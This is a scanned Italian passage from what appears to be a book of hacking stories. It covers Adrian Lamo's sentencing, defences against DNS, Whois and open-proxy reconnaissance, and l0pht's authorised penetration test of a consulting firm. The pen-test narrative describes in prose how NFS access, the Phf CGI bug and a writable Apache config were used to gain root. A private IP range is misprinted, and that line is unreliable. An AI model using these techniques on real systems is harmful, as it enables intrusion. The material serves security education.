Nell'estate del 2004, Adrian Lamo è stato condannato a sei 
mesi di arresti domiciliari e due anni di libertà vigilata. Il tribu- 
nale gli ha anche ordinato di risarcire sessantacinquemila dolla- 
ri di danni alle sue vittime.” Se si considera il potenziale guada- 
gno di Adrian e la sua carenza di fondi (all’epoca era senza fissa 
dimora, per grazia di Dio), questa somma riparatoria è mera- 
mente punitiva. Nello stabilire l'ammontare del risarcimento la 
corte deve considerare una serie di fattori, compresa la capacità 
presente e futura dell'imputato di pagare, nonché le perdite ef- 
fettive patite dalle sue vittime. Un’ingiunzione di risarcimento 
non dovrebbe essere punitiva. Dal mio punto di vista, il giudice 
non ha valutato veramente la capacità di Adrian di pagare una 
somma così grande, ma siccome il suo caso era stato così espo- 
sto sui media, probabilmente ha stabilito quella somma come 
modo per mandare un messaggio. 


5 Vedi http://www.infoworld.com/article/04/07/16/HNlamohome_1.html. 
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Nel frattempo Adrian si sta riabilitando e rifacendo una vita 
per conto proprio. Ora segue delle lezioni di giornalismo in una 
scuola pubblica di Sacramento; scrive anche degli articoli per un 
giornale locale e ha iniziato a fare un po’ di lavoro da freelance: 


Per me il giornalismo è la migliore carriera che possa scegliere, per 
rimanere fedele a ciò che mi rende vivo: la curiosità, il voler vedere 
le cose in modo diverso, il voler sapere di più del mondo che mi cir- 
conda. Le stesse motivazioni dell’hacking. 


„Spero che Adrian sia sincero con se stesso e con me quando 
parla della sua consapevolezza di un nuovo percorso di vita: 


Sarei un bugiardo se dicessi che la gente cambia da un giorno al- 
l’altro. Non posso fermare la mia curiosità così all'improvviso, ma 
posso prendere la mia curiosità e applicarla in modo che non feri- 
sca le persone. Perché se c'è una cosa che ho imparato da questo 
processo, è la consapevolezza che dietro le reti ci sono persone in 
carne e ossa. Non riesco più a vedere un’intrusione informatica sen- 
za pensare alle persone che devono stare in piedi intere notti a preoc- 
cuparsi. 

Penso che il giornalismo e la fotografia siano per me dei surrogati 
intellettuali del crimine. Mi permettono di esprimere la mia curio- 
sità, di vedere le cose in modo differente, di seguire dei percorsi al- 
ternativi in modo rispettoso della legge. 


Ha anche parlato a modo suo in un articolo da freelance per 
la rivista “Network World”. Lo avevano contattato per usarlo co- 
me fonte di un articolo; Adrian invece lanciò l’idea: al posto del- 
l'intervista, avrebbe scritto lui l'articolo di spalle. Il direttore del 
giornale acconsentì. Così accanto al pezzo che ricostruiva il pro- 
filo degli hacker ce n'era uno scritto da lui sul profilo degli am- 
ministratori di rete: 


Il giornalismo è quello che voglio fare. Sento di poter fare la diffe- 
renza e questo non è qualcosa che percepisci se lavori nel campo 
della sicurezza. Quella della sicurezza è un'industria che dipende 
prevalentemente dalle incertezze e dalle paure delle persone per i 
computer e la tecnologia. Il giornalismo ha molto più a che fare con 
la verità. 

L'hacking è unicamente una questione di ego. Riguarda la possibi- 
lità che una sola persona abbia un grande potere nelle sue mani, un 
potere riservato al governo o alle grandi aziende. L'idea che alcuni 
adolescenti possano spegnere la distribuzione dell'alta tensione ter- 
rorizza il governo. E a ragione. 


Non si considera un hacker, un cracker o un intruso. “Se pos- 
so citare Bob Dylan: ‘Non sono un predicatore o un agente di 
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commercio. Faccio solo quello che faccio’. Sono felice quando le 
persone lo capiscono o vogliono capirlo.” 

Adrian dice che i militari e un'agenzia federale governativa gli 
avrebbero offerto dei lavori remunerativi. Li ha rifiutati. “A molte 
persone piace il sesso, ma non tutti lo vogliono fare per vivere.” 

Questo è Adrian il puro... l’hacker adulto che pensa. 


Riflessioni 


Qualsiasi cosa pensiate dell’atteggiamento e delle azioni di 
Adrian Lamo, mi piace credere che siete d'accordo con me a pro- 
posito del modo in cui i procuratori federali hanno calcolato i 
“danni” che avrebbe prodotto. 

So per esperienza personale come i procuratori costruiscono i 
presunti costi nei casi riguardanti gli hacker. Una strategia è quel- 
la di ottenere delle dichiarazioni dalle compagnie che sovrastima- 
no le proprie perdite nella speranza di costringere l'hacker a di- 
chiararsi colpevole anziché andare a processo. Quindi la difesa e 
l'accusa contrattano per raggiungere un accordo su una somma 
più bassa che verrà presentata al giudice; in base alle direttive fe- 
derali, maggiore è il danno, più severa sarà la sentenza. 

Nel caso di Adrian, il procuratore distrettuale scelse di igno- 
rare il fatto che le compagnie avevano appreso di essere vulne- 
rabili all'attacco perché Adrian stesso glielo aveva detto. In ogni 
occasione, protesse le compagnie consigliandole sui bachi nei lo- 
ro sistemi e attese finché non avevano riparato i problemi prima 
di permettere la pubblicazione di notizie riguardanti le sue in- 
trusioni. Sicuramente aveva violato la legge, ma aveva (almeno 
secondo il mio libro) agito in modo etico. 


Contromisure 


La tecnica usata dagli hacker, e caldeggiata da Adrian, di fa- 
re una richiesta al “Whois” può rivelare una certa quantità di 
informazioni di valore, disponibili sui quattro Network Infor- 
mation Center (Nic) che coprono diverse regioni geografiche del 
mondo. Gran parte delle informazioni contenute in questi data- 
base sono pubbliche, disponibili a chiunque usa un programma 
“Whois” o va su un sito web che offre il servizio e inserisce un 
nome di dominio come nytimes.com. 

Le informazioni fornite possono comprendere il nome, gli in- 
dirizzi e-mail, l'indirizzo fisico e il numero di telefono per i con- 
tatti tecnici e amministrativi del dominio. Queste informazioni 
possono essere usate per attacchi di social engineering (vedi il 
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capitolo 10). Per esempio, se venisse fuori un indirizzo e-mail co- 
me, supponiamo, hilda@nytimes.com, questo potrebbe suggeri- 
re la possibilità che non solo questo dipendente ma una buona 
percentuale del personale del “Times” usi solo il proprio nome 
come indirizzo e-mail e forse anche come autenticazione. 

Come spiegato nella storia dell'attacco al “New York Times”, 
Adrian ricevé anche delle informazioni di valore sugli indirizzi 
Ip e i netblock assegnati alla compagnia del giornale, che furono 
una pietra angolare per mandare in porto l'attacco. 

Per limitare la perdita di informazioni, una misura valida per 
ogni compagnia potrebbe consistere nella pubblicazione dei nu- 
meri di telefono del solo centralino aziendale, anziché di perso- 
ne specifiche. I centralinisti dovrebbero essere sottoposti a un 
corso di formazione intensivo, in modo da poter riconoscere gli 
attacchi di social engineering. Inoltre, gli indirizzi di posta elen- 
cati dovrebbero corrispondere agli indirizzi del quartier genera- 
le della corporation e non di settori specifici. 

Ancora meglio: oggi alle aziende è permesso di tenere private 
le informazioni di contatto del nome di dominio, non devono più 
essere pubblicate e rese informazioni disponibili a chiunque ne fac- 
cia richiesta. Su richiesta, il listato della vostra compagnia verrà 
oscurato, rendendo questa tecnica più difficile per chi attacca. 

In questa storia abbiamo menzionato un’altra indicazione uti- 
le: configurate un Dns “split horizon” (a orizzonte diviso). Il che 
comporta la creazione di un server Dns interno che risolve i no- 
mi delle macchine della rete interna, mentre si configura un al- 
tro server Dns all’esterno, che contiene i registri delle macchine 
che vengono usate dal pubblico. 

Un altro metodo di ricognizione prevede che l'hacker inter- 
roghi i nomi di dominio dei server autorizzati, al fine di cono- 
scere il tipo di sistema operativo e di piattaforma usati dai com- 
puter delle corporation, e le informazioni per mappare l’intero 
dominio dell'obiettivo. Queste informazioni sono molto utili per 
coordinare un attacco ulteriore. Il database del Dns può com- 
prendere anche informazioni sulle macchine ospitanti (Hinfo) e 
può far filtrare queste informazioni. Gli amministratori di siste- 
ma dovrebbero evitare di pubblicare le Hinfo su tutti i server Dns 
pubblicamente accessibili. i 

Un altro trucco degli hacker si serve di un'operazione chia- 
mata “trasferimento di zona”. (Anche se senza successo, Adrian 
dice di aver provato questo metodo nei suoi attacchi al “New York 
Times” e a excite@home.) Per proteggere i dati, un server Dns pri- 
mario viene di solito configurato per consentire ad altri server 
autorizzati il permesso di copiare i registri Dns di un dominio 
particolare; questo processo di backup viene chiamato trasferi- 
mento di zona. Se il server primario non è stato configurato cor- 


135 


‘rettamente, un intruso può avviare un trasferimento di zona su 
un qualsiasi computer a sua scelta. E in questo modo può otte- 
nere immediatamente delle informazioni dettagliate su tutte le 
macchine ospitanti e i relativi indirizzi Ip del dominio. 

La procedura per proteggersi contro questo tipo di attacco 
comporta la concessione dei permessi per i trasferimenti di zo- 
na ai soli sistemi necessari alle operazioni di business. Per esse- 
re più specifici, il server Dns primario dovrebbe essere configu- 
rato per permettere dei trasferimenti solo al vostro server Dns se- 
condario di fiducia. 

In aggiunta, bisognerebbe applicare una regola base ai firewall 
per bloccare l’accesso alla porta Tep numero 53 su tutti i server 
della corporation. E si può definire un’altra regola del firewall 
per consentire ai server secondari di fiducia di collegarsi alla por- 
ta Tcp 53 e avviare dei trasferimenti di zona. 

Le aziende dovrebbero rendere difficile a chi attacca l’uso del- 
la tecnica di ricerca rovesciata del Dns. Se da un lato è comodo 
usare dei nomi che rendono chiara la funzione della macchina 
ospitante - nomi come database.compagniaX.com — è ovvio che 
ciò rende anche più facile a un intruso individuare i sistemi che 
vale la pena attaccare. 

Altre tecniche di ricerca rovesciata del Dns comprendono gli 
attacchi tramite dizionario e tramite forza bruta. Per esempio se 
il dominio prescelto è kevinmitnick.com, un attacco tramite di- 
zionario inserirà come prefisso nel nome di dominio tutte le pa- 
role del vocabolario, nella forma di paroladeldizionario.kevinmit- 
nick.com, per identificare altri ospiti all’interno di quel dominio. 
Un attacco di ricerca rovesciata del Dns tramite forza bruta è mol- 
to più complesso, essendo il prefisso costituito da una serie di ca- 
ratteri alfanumerici che vengono sostituiti un carattere alla volta 
alla ricerca di tutto il ciclo delle possibilità. Per bloccare questo 
metodo, i server Dns della compagnia possono essere configura- 
ti per cancellare la pubblicazione dei registri Dns di qualsiasi ho- 
st interno. E un server Dns esterno può essere usato in aggiunta 
a quello interno, così che i nomi interni degli host non arrivino ad 
alcuna rete che non sia di fiducia. Inoltre, l’uso di nomi di server 
interni ed esterni separati aiuta anche a risolvere la questione so- 
pracitata che riguarda i nomi degli host: un server interno Dns, 
protetto dalla visibilità esterna grazie al firewall, può usare dei no- 
mi identificativi degli host come database, ricerca e backup con 
pochi rischi. 

Adrian riuscì a impossessarsi di informazioni di valore sulla 
rete del “New York Times” esaminando l’intestazione di un'e-mail 
ricevuta dal giornale che gli rivelò un indirizzo Ip interno. Gli 
hacker spediscono intenzionalmente delle e-mail a destinatari 
inesistenti di un determinato server per ottenere automatica- 
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mente questo genere di informazioni o passano al setaccio i news- 
group pubblici che sono ugualmente rivelatori. L'header di un’e- 
mail può rivelare un pozzo di informazioni, tra cui le conven- 
zioni usate internamente per i nomi, gli indirizzi Ip interni e il 
percorso preso da un messaggio. Per proteggersi, le compagnie 
dovrebbero configurare i propri server Smtp° in modo da filtra- 
re tutti gli indirizzi Ip interni e le informazioni sugli host dai mes- 
saggi di posta in uscita, facendo in modo che gli identificativi in- 
terni non vengano esposti al pubblico. 

L'arma principale di Adrian era la sua capacità intellettuale 
di individuare dei proxy server mal configurati. Ricordatevi che 
una delle funzioni dei proxy server è di permettere agli utenti che 
si trovano dal lato sicuro di una rete locale di accedere alle ri- 
sorse Internet che si trovano sul lato non sicuro. L'utente all’in- 
terno richiede una pagina web particolare; la richiesta arriva al 
proxy che la forwarda per conto dell'utente, e riporta quindi la 
risposta all'utente. 

Per evitare che gli hacker ottengano informazioni con la tec- 
nica di Adrian, i proxy server dovrebbero essere configurati per 
ascoltare solo l'interfaccia interna. O altrimenti, dovrebbero es- 
sere configurati per ascoltare solo un elenco autorizzato di indi- 
rizzi Ip esterni (whitelist). In questo modo, nessun utente ester- 
no non autorizzato può collegarsi. Un errore comune è di confi- 
gurare dei proxy server che ascoltano tutte le interfacce di rete, 
compresa quella esterna collegata a Internet. Invece, il proxy do- 
vrebbe essere configurato per ammettere solo una serie speciale 
di indirizzi Ip che sono stati accantonati dall'Autorità per l’asse- 
gnazione dei numeri Internet (lana) per le reti private. 

Esistono tre blocchi di indirizzi Ip: 


Da 10.0.0.0 a 10.255.255.255 
Da 172.16.0.0 a 173.31.255.255 
Da 192.168.0.0 a 192.168.255.255 


È inoltre una buona idea implementare una restrizione del- 
le porte per limitare i servizi specifici che un proxy server con- 
sentirà, come il limitare tutte le connessioni in uscita agli http 
(accesso web) o agli https (accesso web sicuro). Per un controllo 
ulteriore, alcuni proxy che usano Ssl possono essere configu- 
rati per esaminare i livelli iniziali di traffico inviato verifican- 
do così che un protocollo non autorizzato non venga incanala- 
to su una porta autorizzata. Fare questi passi ridurrà le possi- 


é Il Smtp, o Simple Mail Transfer Protocol, è il protocollo che gestisce le e- 
mail in uscita di un qualsiasi account di posta elettronica gestito da un client in 
locale. [N.d.T] 
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bilità per l’hacker di usare i proxy per collegarsi a servizi non. 
autorizzati. 

Dopo aver installato e configurato un proxy, esso dovrebbe 
essere testato per cercarne le vulnerabilità. Non sai mai se sei vul- 
nerabile finché non hai testato i punti deboli della sicurezza. Un 
software gratuito per il controllo dei proxy può essere scaricato 
da Internet.” 

Un'altra questione: poiché un utente che installa un pacchet- 
to software potrebbe in alcune circostanze installare inconsape- 
volmente dei software per il server proxy, le pratiche per la sicu- 
rezza delle aziende dovrebbero fornire alcune procedure per con- 
trollare regolarmente i computer alla ricerca di proxy server non 
autorizzati che potrebbero essere stati installati inavvertitamen- 
te. Potete usare lo strumento preferito di Adrian, Proxy Hunter, 
per testare il vostro network. Ricordatevi che un proxy mal con- 
figurato può essere il miglior amico dell’hacker. 

La stragrande maggioranza degli attacchi degli hacker può es- 
sere bloccata seguendo semplicemente dei metodi di sicurezza col- 
laudati ed esercitando la dovuta attenzione. Ma i rischi derivanti 
dallallestimento di un proxy aperto vengono sottostimati troppo 
spesso e rappresentano una delle maggiori vulnerabilità in un gran 
numero di organizzazioni. È abbastanza chiaro? 


Conclusioni 


In qualsiasi campo le incontriate, le persone che hanno una 
testa originale, quelle che pensano in modo approfondito e ve- 
dono il mondo (o almeno parti di esso) in modo più chiaro di 
coloro che gli si trovano intorno, sono persone che è bene in- 
coraggiare. 

E, per quelli come Adrian Lamo, sono persone di cui vale la 
pena seguire il percorso costruttivo. Adrian ha la capacità di da- 
re dei contributi significativi. Seguirò i suoi progressi lasciando- 
mi affascinare. i 


? Per maggiori informazioni, vedi http://www.corpit.ru/mjt/proxycheck.html. 
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6. 
Saggezza e follia dei penetration test 


È vero l’adagio secondo cui i sistemi di sicurez- 
za devono vincere sempre, mentre chi attacca 
deve vincere una volta sola. 

Dustin Dykes 


Pensate a una prigione che assume un esperto per studiare le 
procedure di sicurezza del suo istituto e individuare i varchi che 
potrebbero permettere a un detenuto di evadere. Una compagnia 
segue la stessa linea di pensiero quando assume un'azienda di si- 
curezza per testare l’inviolabilità del suo sito web e delle sue re- 
ti telematiche contro le intrusioni, e per vedere se gli intrusi che 
ha assunto riescono a trovare il modo di accedere a dati sensibi- 
li, entrare in zone riservate dell'ufficio o a trovare delle falle nel- 
la sicurezza che potrebbero mettere la compagnia a rischio. 

Per le persone che lavorano nel settore, questi si chiamano “pe- 
netration test” o, secondo il gergo della categoria, “pen test.” Le 
aziende di sicurezza che conducono queste prove hanno spesso un 
personale composto da (sorpresa) ex hacker. In realtà, gli stessi 
fondatori di queste aziende sono spesso persone che hanno ottime 
credenziali da hacker, anche se preferirebbero che i loro clienti non 
le scoprissero mai. Poiché un hacker è avvezzo a sfruttare i pas- 
saggi noti e meno noti che le compagnie lasciano inavvertitamen- 
te aperti nei loro santuari, è logico che i professionisti della sicu- 
rezza tendano a provenire dalla comunità degli hacker. Molti di 
questi ex hacker hanno imparato sin dalla loro adolescenza che 
“sicurezza” è, in moltissimi casi, un termine improprio. 

Qualsiasi compagnia ordini un penetration test e si aspetti che 
i risultati confermino che la sua sicurezza è integra e priva di ba- 
chi si prepara con ogni probabilità a un brusco risveglio. Quando 
conducono le loro analisi sulla sicurezza, i professionisti del set- 
tore si imbattono negli stessi errori di sempre: semplicemente le 
compagnie non sono abbastanza diligenti nel proteggere le loro 
informazioni brevettate e i propri sistemi informatici. 

La ragione per cui le aziende e le agenzie governative com- 
missionano delle analisi di sicurezza è che hanno bisogno di valu- 
tare la propria posizione in materia, in un determinato momento. 
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Inoltre, dopo aver riparato tutte le vulnerabilità identificate, pos- 
sono misurare i propri progressi. E tuttavia un penetration test è 
come un elettrocardiogramma. Già il giorno dopo un hacker po- 
trebbe entrare usando un exploit “0-day”, anche se l'azienda o l'a- 
genzia hanno superato la revisione della sicurezza a pieni voti. 

Così effettuare un penetration test aspettandosi che confer- 
mi che l’organizzazione sta facendo un lavoro perfetto nel pro- 
teggere le sue informazioni sensibili è una cosa folle. E probabi- 
le che i risultati provino esattamente il contrario, come dimo- 
strano le prossime storie: la prima è su una compagnia di con- 
sulenza; la seconda su un’azienda di biotecnologie. 


Un freddo Natale 


Non molto tempo fa, diversi manager e direttori di una grossa 
azienda di consulenza dell'information technology del New En- 
gland si riunirono nella loro sala conferenze per incontrare un paio 
di consulenti. Posso immaginare che gli informatici della compa- 
gnia presenti al tavolo fossero incuriositi da uno di loro, Pieter 
Zatko, un hacker assai conosciuto con il nome di “Mudge”. 

All’inizio degli anni novanta, Mudge e un suo compagno ave- 
vano riunito un buon numero di persone affini, e variamente as- 
sortite, per lavorare assieme all’interno di un piccolo spazio in un 
capannone di Boston; il gruppo divenne un'associazione di sicu- 
rezza informatica altamente rispettata chiamata l0pht o, ironica- 
mente, l0pht Heavy Industries. (Il nome si scrive con una “L” mi- 
nuscola, uno zero al posto della “o” e, nello stile degli hacker, con 
un “ph” che suona come una “f; si pronuncia “loft”.) Mano a ma- 
no che l'associazione faceva progressi e la sua reputazione cresce- 
va, Mudge veniva invitato a condividere le sue conoscenze. Aveva 
tenuto delle lezioni dimostrative in posti come la scuola di strate- 
gia dell'esercito di Monterey sull'argomento “guerriglia informati- 
va” (information warfare): come entrare nei computer del nemico 
e danneggiarne i servizi senza essere individuati, come pure sulle 
tecniche di distruzione dei dati e cose affini. 

Uno degli strumenti più diffusi tra gli hacker (e a volte anche 
tra gli addetti alla sicurezza) è il pacchetto software chiamato 
10phtCrack. La magia di questo programma viene data per scon- 
tata da coloro che lo usano e sospetto che venga del tutto odiata 
dalla grande maggioranza degli altri. Il gruppo lOpht attirò lat- 
tenzione dei media quando scrisse uno strumento (il ]0phtCrack 
appunto) che craccava rapidamente gli hash delle password.! 


l ! Hash, nella sua accezione più comune, si riferisce a una funzione univoca 
operante in un solo senso (ossia, che-non può essere invertita) atta alla trasfor- 
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Mudge era uno degli autori del J0phtCrack e dei fondatori del si- 
to che rese il programma disponibile agli hacker e a ogni perso- 
na interessata, all’inizio gratuitamente, e poi come un’operazio- 
ne commerciale. 


L'incontro iniziale 


L'invito che la IOpht aveva ricevuto dall'azienda di consulenza 
(la chiameremo “Newton”) venne in seguito alla decisione dell’a- 
zienda di espandere l'offerta dei propri servizi aggiungendo la ca- 
pacità di eseguire dei penetration test. Invece di assumere nuovo 
personale e costruire gradualmente un nuovo reparto, erano alla 
ricerca di un’organizzazione esistente che avrebbero potuto ac- 
quisire e incorporare. All’inizio dell'incontro, una delle persone del- 
l'azienda mise l’idea sul tavolo: “Vogliamo comprarvi e farvi di- 
ventare parte della nostra compagnia”. Mudge ricorda la reazione: 


Il nostro atteggiamento era: “Beh, vediamo un momento, non ci co- 
noscete neanche”. Sapevamo che erano veramente interessati so- 
prattutto per il clamore mediatico suscitato da ]0phtCrack. 


In parte per prendere tempo mentre cercava di abituarsi al- 
l’idea di vendere l'azienda e in parte perché non voleva buttarsi 
a capofitto nei negoziati, Mudge temporeggiò. 


Gli dissi: “Guardate, non sapete veramente che cosa comprereste. 
Che ne direste di pagarci quindicimila dollari per un penetration 
test approfondito della vostra organizzazione?”. 

All’epoca, la 1Opht non era neanche una compagnia specializzata nel 
penetration testing. Ma gli dissi: “Non sapete quali sono le nostre 
capacità, di fatto vi state basando sulla nostra pubblicità. Ci pagate 
quindicimila dollari. Se non vi piace quello che otterrete, non do- 
vrete comprarci e sarà stato comunque del tempo ben speso perché 
voi avrete un buon rapporto sul test di intrusione e noi avremo quin- 
dicimila dollari in banca. E naturalmente, se vi piacerà e vi avremo 
fatto una buona impressione, cosa che noi ci aspettiamo, allora ci 
comprerete”. 

Risposero: “Va bene, ottima idea”. 

E io pensai: “Che idioti!”. 


In base al modo di pensare di Mudge, erano degli “idioti” per- 
ché stavano per autorizzare la squadra della l0pht a entrare nei 


mazione di un testo in chiaro e di lunghezza arbitraria in una stringa di lunghezza 
relativamente limitata.Tale stringa rappresenta una sorta di “impronta digitale” 
del testo in chiaro, e viene detta “valore di hash” o “checksum” crittografico. 
[N.d.T] 
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loro file e nella loro posta, nello stesso momento in cui stavano 
negoziando un accordo per comprare la sua azienda. Pensava di 
riuscire a spiarli di nascosto. 


Le regole del gioco 


I consulenti della sicurezza che effettuano un penetration 
test hanno qualcosa in comune con i poliziotti in borghese della 
narcotici che acquistano droghe: se qualche poliziotto locale non 
informato scopre la transazione ed estrae la pistola, il poliziotto 
della narcotici mostra semplicemente il tesserino. Non c'è rischio 
che vada in prigione. I consulenti della sicurezza che vengono as- 
sunti per testare le difese di un'azienda esigono lo stesso tipo di 
‘ protezione. Invece di un tesserino di riconoscimento, ogni mem- 
bro della squadra che esegue il test richiede una lettera firmata 
dal direttore della compagnia, che dice di fatto: “Questa persona 
è stata assunta per realizzare un progetto per noi. Se la trovate 
mentre fa qualcosa che vi sembra improprio, va bene. Rimanete 
calmi. Lasciatele fare il suo lavoro e mandatemi un messaggio 
per spiegare i particolari”. 

Nella comunità della sicurezza, questa lettera viene anche det- 
ta “lasciapassare per uscire di prigione”. I penetration tester ten- 
dono a essere molto coscienziosi nell’assicurarsi di avere una co- 
pia della lettera con loro quando si trovano dentro o nelle vicinanze 
della compagnia del cliente, nel caso in cui vengano fermati da una 
guardia che ha deciso di fare il duro per impressionare i livelli più 
alti grazie al suo istinto da segugio, o che vengano interrogati da 
un dipendente coscienzioso che ha visto qualcosa di sospetto ed è 
stato tanto spavaldo da affrontare il pen tester. 

Un'altra procedura standard che precede il lancio del test pre- 
vede che il cliente specifichi un insieme di regole base: quali par- 
ti dell'operazione vogliono che siano incluse nel test e quali par- 
ti devono rimanere off-limits. Si tratta di un attacco tecnico, per 
verificare se gli esecutori del test possono ottenere delle infor- 
mazioni sensibili trovando dei sistemi non protetti o superando 
il firewall? Si tratta di un monitoraggio delle applicazioni del so- 
lo sito web pubblico, della rete interna o di entrambe? Saranno 
previsti attacchi di social engineering, cioè dei tentativi di in- 
gannare i dipendenti per far loro rivelare delle informazioni non 
autorizzate? Saranno possibili degli attacchi fisici, in cui i tester 
cercano di infiltrare l’edificio, aggirando le forze di guardia o pas- 
sando dalle entrate riservate ai soli dipendenti? Sarà consentito 
cercare di ottenere informazioni facendo trashing, cioè rovistan- 
do nei cestini della compagnia alla ricerca di pezzi di carta but- 
tati contenenti password o altri dati di valore? Tutto questo deve 
essere definito in anticipo. 
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Spesso la compagnia richiede solo dei test limitati. Un mem- 
bro della 10pht, Carlos, considera questi accordi poco realistici, sot- 
tolineando che “gli hacker non si comportano in questo modo”. È 
a favore di un approccio più aggressivo, in cui ci si sfilano i guan- 
ti e non ci sono restrizioni. Questo tipo di test non è solo più rive- 
latore e di valore per il cliente ma anche più piacevole per gli ese- 
cutori. Come dice Carlos, è “molto più divertente e interessante”. 
In questa occasione, Carlos vide esaudito il suo desiderio: la New- 
ton si disse d'accordo a un attacco senza restrizioni. 

La sicurezza si basa innanzitutto sulla fiducia. L'azienda che 
paga deve innanzitutto fidarsi dell'azienda di sicurezza incarica- 
ta di realizzare l’analisi. Inoltre, la maggior parte delle aziende e 
delle agenzie governative richiedono un accordo di segretezza 
(Non Disclosure Agreement, Nda), per proteggere legalmente le 
informazioni commerciali riservate dal rischio di essere rivelate 
in modo non autorizzato. 

Firmare un Nda è una procedura comune per i pen tester, per- 
ché potrebbero imbattersi in informazioni confidenziali. (Ovvia- 
mente, il Nda sembra quasi superfluo: qualsiasi compagnia che 
abbia fatto uso delle informazioni di un cliente con ogni proba- 
bilità non riuscirà mai a trovare un altro cliente. La discrezione 
è essenzialmente un prerequisito.) Spesso agli esecutori dei test 
viene anche richiesto di firmare una clausola che afferma che l'a- 
zienda farà del suo meglio per non interferire nelle operazioni 
commerciali quotidiane della compagnia. 

Il gruppo della IOpht per il test alla Newton era formato da 
sette persone, che avrebbero lavorato da sole o in coppia, e ogni 
persona o squadra si sarebbe concentrata su aspetti diversi del- 
le operazioni della compagnia. 


Attacco! 


Con i loro “lasciapassare”, i componenti della squadra della 
JOpht potevano essere aggressivi quanto volevano ed essere per- 
sino “rumorosi”. Il che significava che potevano attirare Vatten- 
zione su di sé, un atteggiamento che normalmente un penetra- 
tion tester preferisce evitare. Ma speravano tuttavia di rimanere 
invisibili: “E più interessante ottenere tutte queste informazioni 
e alla fine sapere che non ti hanno individuato. Cerchi sempre di 
farlo”, dice Carlos. 

Assegnandosi il compito di dirigere l'attacco tecnico alla re- 
te, Mudge fu contento nel verificare che gli amministratori di si- 
stema “avevano messo le macchine sottochiave” - cioè avevano 
messo in sicurezza il sistema informatico — il che è quanto an- 
drebbe fatto abitualmente se il server è collegato a una rete non 
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sicura come Internet. Andò alla ricerca di file e directory nella 
speranza di trovarne uno che fosse scrivibile. Se così fosse, po- 
trebbe essere possibile modificare un sistema o un file di confi- 
gurazione, un aiuto non da poco per un'intrusione nella rete. 

Sul server web della Newton girava Apache, un software per 
server molto diffuso. La prima vulnerabilità che Mudge scoprì 
era che il Firewall-1 di controllo della compagnia aveva una con- 
figurazione nascosta di default (o regola) che consentiva l’entra- 
ta di pacchetti con fonte Udp o Tcp dalla porta 53 a tutte le por- 
te più alte, sopra alla 1023. Il suo primo pensiero fu di cercare di 
montare i loro file system esportati via Nfs, ma realizzò rapida- 
mente che il firewall aveva una regola che bloccava l’accesso al 
Daemon Nfs (sulla porta 2049). 

Anche se i servizi di sistema più comuni erano bloccati, Mudge 
conosceva una caratteristica non documentata del sistema ope- 
rativo Solaris che “legava” il rcpbind (il portmapper, o ricognito- 
re di porte) a una porta superiore alla 32770. Il portmapper as- 
segna dei numeri dinamici di porta a certi programmi. Attraver- 
so il portmapper riuscì a trovare la porta dinamica che era stata 
assegnata al servizio del mount daemon (mountd). A seconda del 
formato della richiesta, dice Mudge, “il port daemon metterà an- 
che in campo le richieste del file system di rete (Nfs), perché usa 
lo stesso codice. Ottenni il port daemon dal portmapper, quindi 
arrivai al mount daemon con la mia richiesta Nfs”. Usando un 
programma chiamato Nfsshell, riuscì ad arrivare remotamente 
al file system del sistema. Dice Mudge: “Ottenemmo rapidamen- 
te l'elenco dei numeri di dial-up. Scaricammo il loro intero file 
system esportato. Avevamo un controllo totale sul sistema”. 

Mudge scoprì anche che il server era vulnerabile all’onnipre- .. 
sente baco del Phf (vedi il capitolo 2). Riuscì a indurre lo script 
Cgi del Phf a eseguire dei comandi arbitrari facendo passare la 
stringa Unicode? per una nuova linea di caratteri seguita dall’e- 
secuzione del comando della shell. Esplorando il sistema con l’au- 
silio del Phf scoprì che il server Apache stava girando sotto l’ac- 
count “nobody”. Dopo una disamina ulteriore notò che anche il 
file di configurazione (httpd.conf) era sotto il controllo dell’ac- 
count “nobody”. Questo errore lo mise in condizione di sovra- 
scrivere i contenuti del file httpd.conf. 


2 La stringa è una sequenza di caratteri. Unicode è un sistema universale di 
codifica che assegna un numero e un nome a ogni carattere in maniera indipen- 
dente dal programma, dalla piattaforma e dalla lingua (e dal relativo alfabeto). 
Basato originariamente su un sistema di codifica a 16-bit (65.536 caratteri) oggi 
lo standard Unicode è in grado di codificare circa un milione di caratteri, consi- 
derati sufficienti a rappresentare tutte le lingue del mondo, comprese quelle estin- 
te. [N.d.T] 
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La sua strategia fu di cambiare il file di configurazione di Apa- 
che in modo che la prima volta che Apache fosse stato riavviato, il 
server avrebbe girato con i privilegi dell'account di root. Ma aveva 
bisogno di trovare un modo per cambiare la configurazione in mo- 
do da poter cambiare l'utente sotto cui Apache avrebbe girato. 

Lavorando insieme a un uomo il cui nickname è Hobbit, i due 
riuscirono a trovare un modo per impiegare il programma net- 
cat, insieme a un po' di trucchi nella shell, per avvicinarsi il più 
possibile a una shell interattiva. Poiché l'amministratore di si- 
stema aveva apparentemente cambiato la proprietà dei file nella 
directory “conf” assegnandola a “nobody”, Mudge poté usare il 
comando “sed” per editare il file httpd.conf, in modo che la vol- 
ta successiva che Apache fosse stato riavviato avrebbe girato co- 
me root. (Questa vulnerabilità nella versione di Apache di allora, 
è stata poi corretta.) 

Dato che i cambiamenti non avrebbero avuto effetto finché 
Apache non fosse stato riavviato, non gli restava che aspettare. 
Una volta riavviato il server, Mudge avrebbe eseguito i comandi 
dalla root attraverso la stessa vulnerabilità del Phf; se prima quei 
comandi erano stati eseguiti nel contesto dell'account “nobody”, 
adesso Apache avrebbe girato come root. Con la capacità di ese- 
guire i comandi dalla root, gli sarebbe stato facile assicurarsi un 
controllo pieno del sistema. 

Nel frattempo gli attacchi della l0pht facevano progressi su 
altri fronti. Ciò che la maggior parte di noi, nell'hacking e nella 
sicurezza, chiama “tuffo nella spazzatura”, per Mudge ha una de- 
finizione più formale: analisi fisica. 


Mandammo delle persone a fare analisi “fisica”. Credo che un di- 
pendente [della compagnia del cliente] fosse stato licenziato da po- 
co e invece di buttare i suoi documenti cartacei, avevano buttato tut- 
ta la sua scrivania. I cassetti erano pieni di vecchi biglietti d'aereo, 
manuali e di ogni genere di documenti interni. 

Volevo dimostrare [al cliente] che delle buone pratiche di sicurezza 
non riguardano solo la sicurezza informatica. 

Per noi era molto più facile che setacciare la spazzatura, perché ave- 
vano un compattatore. Ma non erano riusciti a far entrare la scri- 
vania nel compattatore. 

Ce l'ho ancora quella scrivania, da qualche parte. 


Anchela squadra fisica entrò nella sede della compagnia usan- 
do un metodo semplice e, nelle giuste circostanze, quasi infalli- 
bile conosciuto come “l’accodarsi all'ingresso”. Consiste nel se- 
guire da vicino un dipendente mentre passa attraverso una por- 
ta protetta, e funziona particolarmente bene quando si esce dal 
